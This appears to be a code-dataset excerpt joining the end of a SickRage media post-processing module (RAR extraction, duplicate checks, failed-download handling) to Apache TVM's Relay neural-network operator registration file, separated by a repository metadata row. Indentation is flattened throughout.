def unRAR(path, rarFiles, force, result): # pylint: disable=too-many-branches,too-many-statements
"""
Extracts RAR files
:param path: Path to look for files in
:param rarFiles: Names of RAR files
:param force: process currently processing items
:param result: Previous results
:return: List of unpacked file names
"""
unpacked_files = []
if sickbeard.UNPACK and rarFiles:
result.output += logHelper(u"Packed Releases detected: {0}".format(rarFiles), logger.DEBUG)
for archive in rarFiles:
result.output += logHelper(u"Unpacking archive: {0}".format(archive), logger.DEBUG)
failure = None
try:
rar_handle = RarFile(ek(os.path.join, path, archive))
# Skip extraction if any file in archive has previously been extracted
skip_file = False
for file_in_archive in [ek(os.path.basename, x.filename) for x in rar_handle.infolist() if not x.isdir]:
if already_postprocessed(path, file_in_archive, force, result):
result.output += logHelper(
u"Archive file already post-processed, extraction skipped: {0}".format
(file_in_archive), logger.DEBUG)
skip_file = True
break
if skip_file:
continue
rar_handle.extract(path=path, withSubpath=False, overwrite=False)
for x in rar_handle.infolist():
if not x.isdir:
basename = ek(os.path.basename, x.filename)
if basename not in unpacked_files:
unpacked_files.append(basename)
del rar_handle
except ArchiveHeaderBroken:
failure = (u'Archive Header Broken', u'Unpacking failed because the Archive Header is Broken')
except IncorrectRARPassword:
failure = (u'Incorrect RAR Password', u'Unpacking failed because of an Incorrect Rar Password')
except FileOpenError:
failure = (u'File Open Error, check the parent folder and destination file permissions.',
u'Unpacking failed with a File Open Error (file permissions?)')
except InvalidRARArchiveUsage:
failure = (u'Invalid Rar Archive Usage', u'Unpacking Failed with Invalid Rar Archive Usage')
except InvalidRARArchive:
failure = (u'Invalid Rar Archive', u'Unpacking Failed with an Invalid Rar Archive Error')
except Exception as e:
failure = (ex(e), u'Unpacking failed for an unknown reason')
if failure is not None:
result.output += logHelper(u'Failed Unrar archive {0}: {1}'.format(archive, failure[0]), logger.ERROR)
result.missedfiles.append(u'{0} : Unpacking failed: {1}'.format(archive, failure[1]))
result.result = False
continue
result.output += logHelper(u"UnRar content: {0}".format(unpacked_files), logger.DEBUG)
return unpacked_files
def already_postprocessed(dirName, videofile, force, result): # pylint: disable=unused-argument
"""
Check if we already post processed a file
:param dirName: Directory a file resides in
:param videofile: File name
:param force: Force checking when already checking (currently unused)
:param result: True if file is already postprocessed, False if not
:return:
"""
if force:
return False
# Avoid processing the same dir again if we use a process method <> move
main_db_con = db.DBConnection()
sql_result = main_db_con.select("SELECT release_name FROM tv_episodes WHERE release_name IN (?, ?) LIMIT 1", [dirName, videofile.rpartition('.')[0]])
if sql_result:
# result.output += logHelper(u"You're trying to post process a dir that's already been processed, skipping", logger.DEBUG)
return True
# Needed if we have downloaded the same episode @ different quality
# But we need to make sure we check the history of the episode we're going to PP, and not others
try: # if it fails to find any info (because we're doing an unparsable folder (like the TV root dir) it will throw an exception, which we want to ignore
parse_result = NameParser(dirName, tryIndexers=True).parse(dirName)
except (InvalidNameException, InvalidShowException): # ignore the exception, because we kind of expected it, but create parse_result anyway so we can perform a check on it.
parse_result = False # pylint: disable=redefined-variable-type
search_sql = "SELECT tv_episodes.indexerid, history.resource FROM tv_episodes INNER JOIN history ON history.showid=tv_episodes.showid" # This part is always the same
search_sql += " WHERE history.season=tv_episodes.season AND history.episode=tv_episodes.episode"
# If we find a showid, a season number, and one or more episode numbers then we need to use those in the query
if parse_result and parse_result.show.indexerid and parse_result.episode_numbers and parse_result.season_number:
search_sql += " AND tv_episodes.showid={0} AND tv_episodes.season={1} AND tv_episodes.episode={2}".format(
parse_result.show.indexerid, parse_result.season_number, parse_result.episode_numbers[0])
search_sql += " AND tv_episodes.status IN (" + ",".join([str(x) for x in common.Quality.DOWNLOADED]) + ")"
search_sql += " AND history.resource LIKE ? LIMIT 1"
sql_result = main_db_con.select(search_sql, ['%' + videofile])
if sql_result:
# result.output += logHelper(u"You're trying to post process a video that's already been processed, skipping", logger.DEBUG)
return True
return False
def process_media(processPath, videoFiles, nzbName, process_method, force, is_priority, result): # pylint: disable=too-many-arguments
"""
Postprocess mediafiles
:param processPath: Path to postprocess in
:param videoFiles: Filenames to look for and postprocess
:param nzbName: Name of NZB file related
:param process_method: auto/manual
:param force: Postprocess currently postprocessing file
:param is_priority: Boolean, is this a priority download
:param result: Previous results
"""
processor = None
for cur_video_file in videoFiles:
cur_video_file_path = ek(os.path.join, processPath, cur_video_file)
if already_postprocessed(processPath, cur_video_file, force, result):
result.output += logHelper(u"Skipping already processed file: {0}".format(cur_video_file), logger.DEBUG)
continue
try:
processor = postProcessor.PostProcessor(cur_video_file_path, nzbName, process_method, is_priority)
result.result = processor.process()
process_fail_message = u""
except EpisodePostProcessingFailedException as e:
result.result = False
process_fail_message = ex(e)
if processor:
result.output += processor.log
if result.result:
result.output += logHelper(u"Processing succeeded for {0}".format(cur_video_file_path))
else:
result.output += logHelper(u"Processing failed for {0}: {1}".format(cur_video_file_path, process_fail_message), logger.WARNING)
result.missedfiles.append(u"{0} : Processing failed: {1}".format(cur_video_file_path, process_fail_message))
result.aggresult = False
def get_path_dir_files(dirName, nzbName, proc_type):
"""
Get files in a path
:param dirName: Directory to start in
:param nzbName: NZB file, if present
:param proc_type: auto/manual
:return: a tuple of (path,dirs,files)
"""
path = u""
dirs = []
files = []
if dirName == sickbeard.TV_DOWNLOAD_DIR and not nzbName or proc_type == u"manual": # Scheduled Post Processing Active
# Get at first all the subdir in the dirName
for path, dirs, files in ek(os.walk, dirName):
break
else:
path, dirs = ek(os.path.split, dirName) # Script Post Processing
if not (nzbName is None or nzbName.endswith(u'.nzb')) and ek(os.path.isfile, ek(os.path.join, dirName, nzbName)): # For single torrent file without Dir
dirs = []
files = [ek(os.path.join, dirName, nzbName)]
else:
dirs = [dirs]
files = []
return path, dirs, files
def process_failed(dirName, nzbName, result):
"""Process a download that did not complete correctly"""
if sickbeard.USE_FAILED_DOWNLOADS:
processor = None
try:
processor = failedProcessor.FailedProcessor(dirName, nzbName)
result.result = processor.process()
process_fail_message = u""
except FailedPostProcessingFailedException as e:
result.result = False
process_fail_message = ex(e)
if processor:
result.output += processor.log
if sickbeard.DELETE_FAILED and result.result:
if delete_folder(dirName, check_empty=False):
result.output += logHelper(u"Deleted folder: {0}".format(dirName), logger.DEBUG)
if result.result:
result.output += logHelper(u"Failed Download Processing succeeded: ({0}, {1})".format(nzbName, dirName))
else:
result.output += logHelper(u"Failed Download Processing failed: ({0}, {1}): {2}".format(nzbName, dirName, process_fail_message), logger.WARNING)
def subtitles_enabled(video):
"""
Parse video filename to a show to check if it has subtitle enabled
:param video: video filename to be parsed
"""
try:
parse_result = NameParser().parse(video, cache_result=True)
except (InvalidNameException, InvalidShowException):
logger.log(u'Not enough information to parse filename into a valid show. Consider add scene exceptions or improve naming for: {0}'.format(video), logger.WARNING)
return False
if parse_result.show.indexerid:
main_db_con = db.DBConnection()
sql_results = main_db_con.select("SELECT subtitles FROM tv_shows WHERE indexer_id = ? LIMIT 1", [parse_result.show.indexerid])
return bool(sql_results[0]["subtitles"]) if sql_results else False
else:
logger.log(u'Empty indexer ID for: {0}'.format(video), logger.WARNING)
return False
|
gpl-3.0
| 4,548,903,236,749,104,000
| 43.995399
| 177
| 0.646965
| false
| 3.944736
| false
| false
| false
|
Huyuwei/tvm
|
python/tvm/relay/op/nn/_nn.py
|
1
|
26327
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""Backend compiler related feature registration"""
from __future__ import absolute_import
import topi
from topi.util import get_const_tuple
from .. import op as reg
from ..op import OpPattern, schedule_injective
# relu
reg.register_schedule("nn.relu", schedule_injective)
reg.register_pattern("nn.relu", OpPattern.ELEMWISE)
# softmax
@reg.register_schedule("nn.softmax")
def schedule_softmax(_, outputs, target):
"""Schedule definition of softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.softmax", OpPattern.OPAQUE)
schedule_broadcast = schedule_injective
@reg.register_schedule("nn.log_softmax")
def schedule_log_softmax(_, outputs, target):
"""Schedule definition of log_softmax"""
with target:
return topi.generic.schedule_softmax(outputs)
reg.register_pattern("nn.log_softmax", OpPattern.OPAQUE)
# dense
@reg.register_compute("nn.dense")
def compute_dense(attrs, inputs, out_type, target):
"""Compute definition of dense"""
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
return [topi.nn.dense(inputs[0], inputs[1], None, out_dtype)]
@reg.register_schedule("nn.dense")
def schedule_dense(attrs, outputs, target):
"""Schedule definition of dense"""
with target:
return topi.generic.schedule_dense(outputs)
reg.register_pattern("nn.dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# batch_matmul
@reg.register_compute("nn.batch_matmul")
def compute_batch_matmul(attrs, inputs, out_type, target):
"""Compute definition of batch_matmul"""
with target:
return [topi.nn.batch_matmul(inputs[0], inputs[1])]
@reg.register_schedule("nn.batch_matmul")
def schedule_batch_matmul(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_batch_matmul(outputs)
reg.register_pattern("nn.batch_matmul", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_dense
@reg.register_compute("nn.sparse_dense")
def compute_sparse_dense(attrs, inputs, out_type, target):
"""Compute definition of sparse_dense"""
return [topi.nn.sparse_dense(inputs[0], inputs[1], inputs[2], inputs[3])]
@reg.register_schedule("nn.sparse_dense")
def schedule_sparse_dense(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_sparse_dense(outputs)
reg.register_pattern("nn.sparse_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# sparse_transpose
@reg.register_compute("nn.sparse_transpose")
def compute_sparse_transpose(attrs, inputs, out_type, target):
"""Compute definition of sparse_transpose"""
return topi.nn.sparse_transpose(inputs[0], inputs[1], inputs[2])
@reg.register_schedule("nn.sparse_transpose")
def schedule_sparse_transpose(attrs, outputs, target):
"""Schedule definition of batch_matmul"""
with target:
return topi.generic.schedule_sparse_transpose(outputs)
reg.register_pattern("nn.sparse_transpose", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d
def _find_conv2d_op(op):
"""Find the op with conv2d in its tag by traversing."""
if 'conv2d' in op.tag:
return op
for tensor in op.input_tensors:
op_ = _find_conv2d_op(tensor.op)
if op_ is not None:
return op_
return None
@reg.register_compute("nn.conv2d")
def compute_conv2d(attrs, inputs, out_type, target):
"""Compute definition of conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.kernel_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if out_dtype in ("same", "")
else out_dtype)
assert layout in ["NCHW", "NHWC", "NCHW4c"]
(dilation_h, dilation_w) = dilation
if dilation_h < 1 or dilation_w < 1:
raise ValueError("dilation should be positive value")
def _get_out_depth():
weight_shape = get_const_tuple(inputs[1].shape)
if kernel_layout == "HWOI":
return weight_shape[2] * weight_shape[3]
return weight_shape[0] * weight_shape[1]
if groups == 1:
out = topi.nn.conv2d(
inputs[0], inputs[1], strides, padding,
dilation, layout, out_dtype)
elif layout == "NCHW" and _get_out_depth() == groups:
out = topi.nn.depthwise_conv2d_nchw(
inputs[0], inputs[1], strides, padding, dilation, out_dtype)
elif layout == "NHWC" and kernel_layout == "HWOI" and _get_out_depth() == groups:
out = topi.nn.depthwise_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, dilation, out_dtype)
elif layout in ['NCHW', 'NCHW4c']:
out = topi.nn.group_conv2d_nchw(inputs[0], inputs[1], strides, padding, dilation, groups,
out_dtype)
else:
raise ValueError("not support arbitrary group number for now")
return [out]
@reg.register_schedule("nn.conv2d")
def schedule_conv2d(attrs, outs, target):
"""Schedule definition of conv2d"""
groups = attrs.groups
layout = attrs.data_layout
kernel_layout = attrs.kernel_layout
with target:
if groups == 1 and layout == "NCHW":
return topi.generic.schedule_conv2d_nchw(outs)
if groups == 1 and layout == "NCHW4c":
return topi.generic.schedule_conv2d_nchw(outs)
if groups == 1 and layout == "NHWC":
return topi.generic.schedule_conv2d_nhwc(outs)
if groups != 1:
# collect in_channels to distinguish depthwise and group conv2d
op = _find_conv2d_op(outs[0].op)
assert op is not None
is_depthwise = 'depthwise' in op.tag
if is_depthwise:
if layout == "NCHW":
# TODO(leyuan, merrymercy, Huyuwei): fold depthwise topi into conv2d.
return topi.generic.schedule_depthwise_conv2d_nchw(outs)
if layout == "NHWC" and kernel_layout == "HWOI":
return topi.generic.schedule_depthwise_conv2d_nhwc(outs)
else:
if layout in ["NCHW", "NCHW4c"]:
return topi.generic.schedule_group_conv2d_nchw(outs)
raise ValueError("No compatible schedule")
@reg.register_alter_op_layout("nn.conv2d")
def alter_op_layout_conv2d(attrs, inputs, tinfos):
"""Alternate the layout of conv2d"""
from ... import op
return topi.nn.conv2d_alter_layout(attrs, inputs, tinfos, op)
@reg.register_legalize("nn.conv2d")
def legalize_conv2d(attrs, inputs, types):
"""Legalize conv2d op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.conv2d_legalize(attrs, inputs, types)
reg.register_pattern("nn.conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# conv2d_transpose
@reg.register_compute("nn.conv2d_transpose")
def compute_conv2d_transpose(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_transpose"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
groups = attrs.groups
layout = attrs.data_layout
out_dtype = attrs.out_dtype
out_dtype = (inputs[0].dtype if out_dtype in ("same", "")
else out_dtype)
assert layout == "NCHW", "only support nchw for now"
assert dilation == (1, 1), "not support dilate now"
assert groups == 1, "only support groups == 1 for now"
out = topi.nn.conv2d_transpose_nchw(
inputs[0], inputs[1], strides, padding, out_dtype)
output_padding = get_const_tuple(attrs.output_padding)
out = topi.nn.pad(out,
[0, 0, 0, 0], [0, 0, output_padding[0], output_padding[1]])
return [out]
@reg.register_schedule("nn.conv2d_transpose")
def schedule_conv2d_transpose(attrs, outs, target):
"""Schedule definition of conv2d_transpose"""
with target:
return topi.generic.schedule_conv2d_transpose_nchw(outs)
reg.register_pattern("nn.conv2d_transpose", OpPattern.OUT_ELEMWISE_FUSABLE)
# bias_add
reg.register_schedule("nn.bias_add", schedule_injective)
reg.register_pattern("nn.bias_add", OpPattern.BROADCAST)
# max_pool2d
@reg.register_schedule("nn.max_pool2d")
def schedule_max_pool2d(attrs, outs, target):
"""Schedule definition of max_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d
@reg.register_schedule("nn.avg_pool2d")
def schedule_avg_pool2d(attrs, outs, target):
"""Schedule definition of avg_pool2d"""
layout = attrs.layout
with target:
return topi.generic.schedule_pool(outs, layout)
reg.register_pattern("nn.avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# max_pool2d_grad
@reg.register_schedule("nn.max_pool2d_grad")
def schedule_max_pool2d_grad(attrs, outs, target):
"""Schedule definition of max_pool2d_grad"""
with target:
return topi.generic.schedule_pool_grad(outs)
reg.register_pattern("nn.max_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# avg_pool2d_grad
@reg.register_schedule("nn.avg_pool2d_grad")
def schedule_avg_pool2d_grad(attrs, outs, target):
"""Schedule definition of avg_pool2d_grad"""
with target:
return topi.generic.schedule_pool_grad(outs)
reg.register_pattern("nn.avg_pool2d_grad", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
@reg.register_schedule("nn.global_max_pool2d")
def schedule_global_max_pool2d(_, outs, target):
"""Schedule definition of global_max_pool2d"""
with target:
return topi.generic.schedule_adaptive_pool(outs)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
@reg.register_schedule("nn.global_avg_pool2d")
def schedule_global_avg_pool2d(_, outs, target):
"""Schedule definition of global_avg_pool2d"""
with target:
return topi.generic.schedule_adaptive_pool(outs)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_schedule("nn.leaky_relu", schedule_broadcast)
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_schedule("nn.prelu", schedule_broadcast)
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_schedule("nn.batch_flatten", schedule_broadcast)
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype, target):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis,
attrs.alpha, attrs.beta, attrs.bias)]
@reg.register_schedule("nn.lrn")
def schedule_lrn(attrs, outs, target):
"""Schedule definition of lrn"""
with target:
return topi.generic.schedule_lrn(outs)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# l2_normalize
@reg.register_compute("nn.l2_normalize")
def compute_l2_normalize(attrs, inputs, out_dtype, target):
"""Compute definition of l2 normalize"""
return [topi.nn.l2_normalize(inputs[0], attrs.eps, attrs.axis)]
@reg.register_schedule("nn.l2_normalize")
def schedule_l2_normalize(attrs, outs, target):
"""Schedule definition of l2 normalize"""
with target:
return topi.generic.schedule_l2_normalize(outs)
reg.register_pattern("nn.l2_normalize", OpPattern.OUT_ELEMWISE_FUSABLE)
# upsampling
reg.register_schedule("nn.upsampling", reg.schedule_injective)
def schedule_upsampling(_, outs, target):
"""Schedule definition of upsampling"""
with target:
return topi.generic.schedule_injective(outs)
@reg.register_compute("nn.upsampling")
def compute_upsampling(attrs, inputs, out_dtype, target):
scale = attrs.scale
layout = attrs.layout
method = attrs.method
align_corners = attrs.align_corners
return [topi.nn.upsampling(inputs[0], scale, layout, method, align_corners)]
# pad
reg.register_schedule("nn.pad", schedule_broadcast)
# mirror_pad
reg.register_schedule("nn.mirror_pad", schedule_broadcast)
@reg.register_compute("nn.mirror_pad")
def compute_mirror_pad(attrs, inputs, out_dtype, target):
pad_before, pad_after = list(zip(*attrs.pad_width))
mode = attrs.mode
out = topi.nn.mirror_pad(inputs[0], pad_before=pad_before, pad_after=pad_after, mode=mode)
return [out]
# winograd related operators
@reg.register_compute("nn.contrib_conv2d_winograd_without_weight_transform")
def compute_contrib_conv2d_winograd_without_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_winograd_without_weight_transform"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
groups = attrs.get_int("groups")
data_layout = attrs.get_str("data_layout")
out_dtype = attrs.get_str("out_dtype")
tile_size = attrs.get_int("tile_size")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
assert dilation == (1, 1), "Do not support dilate now"
assert groups == 1, "Do not supoort arbitrary group number"
out = topi.nn.conv2d_winograd_without_weight_transform(
inputs[0], inputs[1], strides, padding, dilation, data_layout,
out_dtype, tile_size)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_without_weight_transform")
def schedule_contrib_conv2d_winograd_without_weight_transform(attrs, outs, target):
"""Schedule definition of conv2d_winograd_without_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_without_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_without_weight_transform",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_weight_transform")
def compute_contrib_conv2d_winograd_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of contrib_conv2d_winograd_weight_transform"""
out = topi.nn.conv2d_winograd_weight_transform(
inputs[0], attrs.get_int('tile_size'))
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_weight_transform")
def schedule_contrib_conv2d_winograd_weight_transform(attrs, outs, target):
"""Schedule definition of contrib_conv2d_winograd_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_weight_transform",
OpPattern.OUT_ELEMWISE_FUSABLE)
# winograd nnpack related operators
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_without_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_without_weight_transform(
attrs, inputs, out_dtype, target):
"""Compute definition of conv2d_winograd_nnpack_without_weight_transform"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
groups = attrs.get_int("groups")
data_layout = attrs.get_str("data_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
assert dilation == (1, 1), "Do not support dilate now"
assert groups == 1, "Do not supoort arbitrary group number"
# No bias
out = topi.nn.conv2d_winograd_nnpack_without_weight_transform(
inputs[0], inputs[1], None, strides, padding, dilation, data_layout,
out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_nnpack_without_weight_transform")
def schedule_contrib_conv2d_winograd_nnpack_without_weight_transform(attrs, outs, target):
"""Schedule definition of conv2d_winograd_nnpack_without_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_nnpack_without_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_without_weight_transform",
OpPattern.OPAQUE)
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_weight_transform(attrs, inputs, out_dtype, target):
"""Compute definition of contrib_conv2d_winograd_nnpack_weight_transform"""
convolution_algorithm = attrs.get_int('convolution_algorithm')
out = topi.nn.conv2d_winograd_nnpack_weight_transform(
inputs[0], convolution_algorithm, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def schedule_contrib_conv2d_winograd_nnpack_weight_transform(attrs, outs, target):
"""Schedule definition of contrib_conv2d_winograd_nnpack_weight_transform"""
with target:
return topi.generic.schedule_conv2d_winograd_nnpack_weight_transform(outs)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_weight_transform",
OpPattern.OPAQUE)
@reg.register_compute("nn.contrib_conv2d_NCHWc")
def compute_contrib_conv2d_NCHWc(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.conv2d_NCHWc(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_NCHWc")
def schedule_contrib_conv2d_NCHWc(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc"""
with target:
return topi.generic.schedule_conv2d_NCHWc(outs)
reg.register_pattern("nn.contrib_conv2d_NCHWc",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_NCHWc_int8")
def compute_contrib_conv2d_NCHWc_int8(attrs, inputs, out_dtype, target):
"""Compute definition of conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.conv2d_NCHWc_int8(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_conv2d_NCHWc_int8")
def schedule_contrib_conv2d_NCHWc_int8(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc_int8"""
with target:
return topi.generic.schedule_conv2d_NCHWc_int8(outs)
reg.register_pattern("nn.contrib_conv2d_NCHWc_int8",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_depthwise_conv2d_NCHWc")
def compute_contrib_depthwise_conv2d_NCHWc(attrs, inputs, out_dtype, target):
"""Compute definition of depthwise conv2d NCHWc"""
# pylint: disable=assignment-from-no-return
padding = attrs.get_int_tuple("padding")
strides = attrs.get_int_tuple("strides")
dilation = attrs.get_int_tuple("dilation")
data_layout = attrs.get_str("data_layout")
out_layout = attrs.get_str("out_layout")
out_dtype = attrs.get_str("out_dtype")
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
out = topi.nn.depthwise_conv2d_NCHWc(inputs[0], inputs[1], strides, padding, dilation,
data_layout, out_layout, out_dtype)
return [out]
@reg.register_schedule("nn.contrib_depthwise_conv2d_NCHWc")
def schedule_contrib_depthwise_conv2d_NCHWc(attrs, outs, target):
"""Schedule definition of contrib_conv2d_NCHWc"""
with target:
return topi.generic.schedule_depthwise_conv2d_NCHWc(outs)
reg.register_pattern("nn.contrib_depthwise_conv2d_NCHWc",
OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.deformable_conv2d")
def compute_deformable_conv2d(attrs, inputs, out_dtype, target):
"""Compute definition of deformable_conv2d"""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
dilation = get_const_tuple(attrs.dilation)
deformable_groups = attrs.deformable_groups
groups = attrs.groups
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype in ("same", "") else out_dtype
with target:
out = topi.nn.deformable_conv2d_nchw(inputs[0], inputs[1], inputs[2], strides, padding,
dilation, deformable_groups, groups, out_dtype)
return [out]
@reg.register_schedule("nn.deformable_conv2d")
def schedule_deformable_conv2d(attrs, outs, target):
"""Schedule definition of deformable_conv2d"""
with target:
return topi.generic.schedule_deformable_conv2d_nchw(outs)
reg.register_pattern("nn.deformable_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.bitpack")
def compute_bitpack(attrs, inputs, out_dtype, target):
"""Compute definition for bitpack"""
bits = attrs.bits
pack_axis = attrs.pack_axis
bit_axis = attrs.bit_axis
pack_type = attrs.pack_type
name = attrs.name
with target:
out = topi.nn.bitpack(inputs[0], bits, pack_axis, bit_axis, pack_type,
name)
return [out]
@reg.register_schedule("nn.bitpack")
def schedule_bitpack(attrs, outs, target):
with target:
return topi.generic.schedule_bitpack(outs)
reg.register_pattern("nn.bitpack", OpPattern.INJECTIVE)
@reg.register_compute("nn.bitserial_conv2d")
def compute_bitserial_conv2d(attrs, inputs, out_dtype, target):
"""Compute definition for bitserial conv2d."""
padding = get_const_tuple(attrs.padding)
strides = get_const_tuple(attrs.strides)
activation_bits = attrs.activation_bits
weight_bits = attrs.weight_bits
layout = attrs.data_layout
pack_dtype = attrs.pack_dtype
out_dtype = attrs.out_dtype
unipolar = attrs.unipolar
if layout == 'NCHW':
with target:
out = topi.nn.bitserial_conv2d_nchw(
inputs[0], inputs[1], strides, padding, activation_bits,
weight_bits, pack_dtype, out_dtype, unipolar)
elif layout == 'NHWC':
with target:
out = topi.nn.bitserial_conv2d_nhwc(
inputs[0], inputs[1], strides, padding, activation_bits,
weight_bits, pack_dtype, out_dtype, unipolar)
else:
raise ValueError("Data layout not supported.")
return [out]
@reg.register_schedule("nn.bitserial_conv2d")
def schedule_bitserial_conv2d(attrs, outs, target):
"""Schedule definition for bitserial conv2d."""
layout = attrs.data_layout
if layout == 'NCHW':
with target:
return topi.generic.schedule_bitserial_conv2d_nchw(outs)
elif layout == 'NHWC':
with target:
return topi.generic.schedule_bitserial_conv2d_nhwc(outs)
else:
raise ValueError("Data layout not supported.")
@reg.register_legalize("nn.bitserial_conv2d")
def legalize_bitserial_conv2d(attrs, inputs, types):
"""Legalize bitserial_conv2d op.
Parameters
----------
attrs : tvm.attrs.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.bitserial_conv2d_legalize(attrs, inputs, types)
reg.register_pattern("nn.bitserial_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# bitserial_dense
@reg.register_compute("nn.bitserial_dense")
def compute_bitserial_dense(attrs, inputs, out_type, target):
"""Compute definition of bitserial_dense"""
data_bits = attrs.data_bits
weight_bits = attrs.weight_bits
pack_dtype = attrs.pack_dtype
out_dtype = attrs.out_dtype
out_dtype = inputs[0].dtype if out_dtype == "" else out_dtype
unipolar = attrs.unipolar
return [
topi.nn.bitserial_dense(
inputs[0],
inputs[1],
data_bits,
weight_bits,
pack_dtype,
out_dtype,
unipolar)
]
@reg.register_schedule("nn.bitserial_dense")
def schedule_bitserial_dense(attrs, outputs, target):
"""Schedule definition of bitserial_dense"""
with target:
return topi.generic.schedule_bitserial_dense(outputs)
